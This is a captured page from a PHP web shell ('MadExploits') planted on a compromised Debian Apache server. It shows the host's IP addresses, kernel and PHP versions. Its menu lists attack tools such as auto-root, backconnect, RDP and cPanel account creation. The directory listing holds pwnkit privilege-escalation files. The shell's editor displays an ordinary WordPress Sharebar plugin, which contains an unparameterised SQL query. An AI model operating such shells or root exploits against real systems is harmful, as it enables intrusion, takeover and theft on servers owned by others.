Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 18.191.174.45
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
OLDHUROMsharebar /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-sr-x
GCONV_PATH=.
[ DIR ]
drwxr-sr-x
css
[ DIR ]
drwxrwsrwx
images
[ DIR ]
drwxrwsrwx
js
[ DIR ]
drwxrwsrwx
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.txt
4.82
KB
-rw-r--r--
screenshot-1.gif
16.52
KB
-rw-r--r--
screenshot-2.gif
51.46
KB
-rw-r--r--
screenshot-3.gif
47.58
KB
-rw-r--r--
screenshot-4.gif
34.15
KB
-rw-r--r--
sharebar-admin.php
19.61
KB
-rw-r--r--
sharebar.php
14.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sharebar.php
<?php /* Plugin Name: Sharebar Plugin URI: http://devgrow.com/sharebar-wordpress-plugin/ Description: Adds a dynamic bar with sharing icons (Facebook, Twitter, etc.) that changes based on browser size and page location. More info and demo at: <a href="http://devgrow.com/sharebar-wordpress-plugin/">Sharebar Plugin Home</a> Version: 1.2.5 Author: Monjurul Dolon Author URI: http://mdolon.com/ License: GPL2 */ /* Copyright 2010 Monjurul Dolon (email : md@devgrow.com) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License, version 2, as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ $sharebar_options = array("auto_posts","auto_pages","horizontal","width","position","credit","leftoffset","rightoffset","swidth","twitter_username","sbg","sborder"); function sharebar_install(){ global $wpdb; $table = $wpdb->prefix."sharebar"; if($wpdb->get_var("SHOW TABLES LIKE '$table'") != $table) { $structure = "CREATE TABLE $table ( id mediumint(9) NOT NULL AUTO_INCREMENT, position mediumint(9) NOT NULL, enabled int(1) NOT NULL, name VARCHAR(80) NOT NULL, big text NOT NULL, small text NULL, UNIQUE KEY id (id) );"; $wpdb->query($structure); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('1','1','digg', '<script type=\"text/javascript\">(function() { var s = document.createElement(\'SCRIPT\'), s1 = document.getElementsByTagName(\'SCRIPT\')[0]; s.type = \'text/javascript\'; s.async = true; s.src = \'http://widgets.digg.com/buttons.js\'; s1.parentNode.insertBefore(s, s1); })(); </script><a class=\"DiggThisButton DiggMedium\"></a>', '<script type=\"text/javascript\">(function() { var s = document.createElement(\'SCRIPT\'), s1 = document.getElementsByTagName(\'SCRIPT\')[0]; s.type = \'text/javascript\'; s.async = true; s.src = \'http://widgets.digg.com/buttons.js\'; s1.parentNode.insertBefore(s, s1); })(); </script><a class=\"DiggThisButton DiggCompact\"></a>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('1','2','twitter', '<a href=\"http://twitter.com/share\" class=\"twitter-share-button\" data-count=\"vertical\" data-via=\"[twitter]\">Tweet</a><script type=\"text/javascript\" src=\"http://platform.twitter.com/widgets.js\"></script>', '<a href=\"http://twitter.com/share\" class=\"twitter-share-button\" data-count=\"horizontal\" data-via=\"[twitter]\">Tweet</a><script type=\"text/javascript\" src=\"http://platform.twitter.com/widgets.js\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','3','facebook', '<iframe src=\"http://www.facebook.com/plugins/like.php?href=[url]&layout=box_count&show_faces=false&width=60&action=like&colorscheme=light&height=45\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:45px; height:60px;\" allowTransparency=\"true\"></iframe>', '<iframe src=\"http://www.facebook.com/plugins/like.php?href=[url]&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:85px; height:21px;\" allowTransparency=\"true\"></iframe>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('1','4','sharethis', '<script type=\"text/javascript\" src=\"http://w.sharethis.com/button/buttons.js\"></script><span class=\"st_facebook_vcount\" displayText=\"Share\"></span><span class=\"st_email\" displayText=\"Email\"></span><span class=\"st_sharethis\" displayText=\"Share\"></span>', '<span class=\"st_facebook_hcount\" displayText=\"Share\"></span><span class=\"st_email\" displayText=\"Email\"></span><span class=\"st_sharethis\" displayText=\"Share\"></span>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','5','buzz', '<a title=\"Post to Google Buzz\" class=\"google-buzz-button\" href=\"http://www.google.com/buzz/post\" data-button-style=\"normal-count\"></a><script type=\"text/javascript\" src=\"http://www.google.com/buzz/api/button.js\"></script>', '<a title=\"Post to Google Buzz\" class=\"google-buzz-button\" href=\"http://www.google.com/buzz/post\" data-button-style=\"small-count\"></a><script type=\"text/javascript\" src=\"http://www.google.com/buzz/api/button.js\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','6','reddit', '<script type=\"text/javascript\" src=\"http://reddit.com/static/button/button2.js\"></script>', '<script type=\"text/javascript\" src=\"http://reddit.com/static/button/button1.js\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','7','dzone', '<script language=\"javascript\" src=\"http://widgets.dzone.com/links/widgets/zoneit.js\"></script>', '<script language=\"javascript\" src=\"http://widgets.dzone.com/links/widgets/zoneit.js\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','8','stumbleupon', '<script src=\"http://www.stumbleupon.com/hostedbadge.php?s=5\"></script>', '<script src=\"http://www.stumbleupon.com/hostedbadge.php?s=2\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','9','yahoo', '<script type=\"text/javascript\" src=\"http://d.yimg.com/ds/badge2.js\" badgetype=\"square\">[url]</script>', '<script type=\"text/javascript\" src=\"http://d.yimg.com/ds/badge2.js\" badgetype=\"small-votes\">[url]</script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','10','designfloat', '<script type=\"text/javascript\">submit_url = \'[url]\';</script><script type=\"text/javascript\" src=\"http://www.designfloat.com/evb2/button.php\"></script>', '<script type=\"text/javascript\">submit_url = \'[url]\';</script><script type=\"text/javascript\" src=\"http://www.designfloat.com/evb/button.php\"></script>')"); $wpdb->query("INSERT INTO $table(enabled, position,name, big, small) VALUES('0','11','email', '<a href=\"mailto:?subject=[url]\" class=\"sharebar-button email\">Email</a>', '<a href=\"mailto:?subject=[url]\" class=\"sharebar-button email\">Email</a>')"); add_option('sharebar_auto_posts', 1); add_option('sharebar_auto_pages', 1); add_option('sharebar_horizontal', 1); add_option('sharebar_credit', 0); add_option('sharebar_minwidth','1000'); add_option('sharebar_position','left'); add_option('sharebar_leftoffset','20'); add_option('sharebar_rightoffset','10'); add_option('sharebar_swidth','65'); add_option('sharebar_twitter_username','ThinkDevGrow'); add_option('sharebar_bg','#ffffff'); add_option('sharebar_border','#cccccc'); } } function sharebar_reset(){ global $wpdb; $table = $wpdb->prefix."sharebar"; $wpdb->query("DROP TABLE IF EXISTS $table"); sharebar_install(); } function sharebar_menu(){ global $wpdb, $sharebar_options; foreach($sharebar_options as $option) $$option = get_option('sharebar_'.$option); include 'sharebar-admin.php'; } function sharebar_settings($settings){ global $sharebar_options; foreach($sharebar_options as $option) update_option('sharebar_'.$option,$settings[$option]); } function sharebar_auto($content){ if((get_option('sharebar_auto_posts') && is_single()) || (get_option('sharebar_auto_pages') && is_page())){ $str = sharebar(false); $str .= sharebar_horizontal(false); } $newcontent = $str.$content; return $newcontent; } function sharebar($print = true){ global $wpdb, $post; $sharebar_hide = get_post_meta($post->ID, 'sharebar_hide', true); $sbg = get_option('sharebar_sbg'); $sborder = get_option('sharebar_sborder'); if(empty($sharebar_hide)) { $credit = get_option('sharebar_credit'); $str = '<ul id="sharebar" style="background:#'.$sbg.';border-color:#'.$sborder.';">'; $results = $wpdb->get_results($wpdb->prepare("SELECT * FROM ".$wpdb->prefix."sharebar WHERE enabled=1 ORDER BY position, id ASC", null)); $str .= "\n"; foreach($results as $result){ $str .= '<li>'.sharebar_filter($result->big).'</li>'; } if($credit) $str .= '<li class="credit"><a href="http://devgrow.com/sharebar" target="_blank">Sharebar</a></li>'; $str .= '</ul>'; if($print) echo $str; else return $str; } } function sharebar_horizontal($print = true){ if(get_option('sharebar_horizontal')){ global $wpdb; $str = '<ul id="sharebarx">'; $results = $wpdb->get_results($wpdb->prepare("SELECT * FROM ".$wpdb->prefix."sharebar WHERE enabled=1 ORDER BY position, id ASC", null)); $str .= "\n"; foreach($results as $result) { $str .= '<li>'.sharebar_filter($result->small).'</li>'; } $str .= '</ul>'; if($print) echo $str; else return $str; } } function sharebar_button($name, $size = 'big'){ global $wpdb; $item = $wpdb->get_row($wpdb->prepare("SELECT * FROM ".$wpdb->prefix."sharebar WHERE name='$name'")); if($size == 'big') echo stripslashes($item->big); else echo stripslashes($item->small); } function sharebar_update_button($id, $uptask){ global $wpdb; if($uptask == 'enable') $wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."sharebar SET enabled='1' WHERE id='%d'", $id)); elseif($uptask == 'disable') $wpdb->query($wpdb->prepare("UPDATE ".$wpdb->prefix."sharebar SET enabled='0' WHERE id='%d'", $id)); elseif($uptask == 'delete') $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."sharebar WHERE id=%d LIMIT 1", $id)); } function sharebar_init(){ if(!is_admin()) wp_enqueue_script('sharebar', get_bloginfo('wpurl').'/wp-content/plugins/sharebar/js/sharebar.js',array('jquery')); } function sharebar_header(){ global $sharebar_options; foreach($sharebar_options as $option) $$option = get_option('sharebar_'.$option); if(function_exists('wp_enqueue_script') && (is_single() || is_page())) { echo '<link rel="stylesheet" href="'.get_bloginfo('wpurl').'/wp-content/plugins/sharebar/css/sharebar.css" type="text/css" media="screen" />'; if($horizontal) $hori = 'true'; else $hori = 'false'; if(!$width) $width = 1000; echo "\n"; ?><script type="text/javascript">jQuery(document).ready(function($) { $('.sharebar').sharebar({horizontal:'<?php echo $hori; ?>',swidth:'<?php echo $swidth; ?>',minwidth:<?php echo $width; ?>,position:'<?php echo $position; ?>',leftOffset:<?php echo $leftoffset; ?>,rightOffset:<?php echo $rightoffset; ?>}); });</script><?php echo "\n"; ?><!-- Sharebar Plugin by Monjurul Dolon (http://mdolon.com/) - more info at: http://devgrow.com/sharebar-wordpress-plugin --><?php echo "\n"; ?><?php } } function sharebar_filter($input){ global $post; $code = array('[title]','[url]','[author]','[twitter]'); $values = array($post->post_title,get_permalink(),get_the_author(),get_option('sharebar_twitter_username')); return str_replace($code,$values,$input); } function sharebar_admin_actions(){ if(current_user_can('manage_options')) add_options_page("Sharebar", "Sharebar", 1, "Sharebar", "sharebar_menu"); } function sharebar_custom_boxes() { add_meta_box( 'Sharebar', 'Sharebar Settings', 'sharebar_post_options', 'post', 'side', 'low'); add_meta_box( 'Sharebar', 'Sharebar Settings', 'sharebar_post_options', 'page', 'side', 'low'); } function sharebar_post_options(){ global $post; $sharebar_hide = get_post_meta($post->ID, 'sharebar_hide', true); ?> <p> <input name="sharebar_hide" id="sharebar_hide" type="checkbox" <?php checked(true, $sharebar_hide, true) ?> /> <label for="sharebar_hide">Disable Sharebar on this post?</label> </p> <?php } function sharebar_save_post_options($post_id) { if (!isset($_POST['sharebar_hide']) || empty($_POST['sharebar_hide'])) { delete_post_meta($post_id, 'sharebar_hide'); return; } $post = get_post($post_id); if (!$post || $post->post_type == 'revision') return; update_post_meta($post_id, 'sharebar_hide', true); } function sharebar_admin_head(){ echo ' <link rel="stylesheet" media="screen" type="text/css" href="'.get_bloginfo('wpurl').'/wp-content/plugins/sharebar/css/colorpicker.css" /> <script type="text/javascript" src="'.get_bloginfo('wpurl').'/wp-content/plugins/sharebar/js/colorpicker.js"></script> <script type="text/javascript"> jQuery(document).ready(function($) { var ids = ["sbg","sborder"]; $.each(ids, function() { var id = this; $("#"+this).ColorPicker({ onSubmit: function(hsb, hex, rgb, el) { $(el).val(hex); $(el).ColorPickerHide(); }, onBeforeShow: function () { $(this).ColorPickerSetColor(this.value); }, onChange: function(hsb, hex, rgb, el) { $("#"+id).val(hex); } }); }); }); </script>'; } function cleanInput($input) { $search = array( '@<script[^>]*?>.*?</script>@si', // Strip out javascript '@<[\/\!]*?[^<>]*?>@si', // Strip out HTML tags '@<style[^>]*?>.*?</style>@siU', // Strip style tags properly '@<![\s\S]*?--[ \t\n\r]*>@' // Strip multi-line comments ); $output = preg_replace($search, '', $input); return $output; } function sanitize($input) { if (is_array($input)) { foreach($input as $var=>$val) { $output[$var] = sanitize($val); } } else { if (get_magic_quotes_gpc()) { $input = stripslashes($input); } $input = cleanInput($input); $output = mysql_real_escape_string($input); } return $output; } add_filter('the_content', 'sharebar_auto'); add_action('init', 'sharebar_init'); add_action('wp_head', 'sharebar_header'); add_action('admin_head', 'sharebar_admin_head'); add_action('activate_sharebar/sharebar.php', 'sharebar_install'); add_action('admin_menu', 'sharebar_admin_actions'); add_action('add_meta_boxes', 'sharebar_custom_boxes'); add_action('draft_post', 'sharebar_save_post_options'); add_action('publish_post', 'sharebar_save_post_options'); add_action('save_post', 'sharebar_save_post_options'); ?>
Close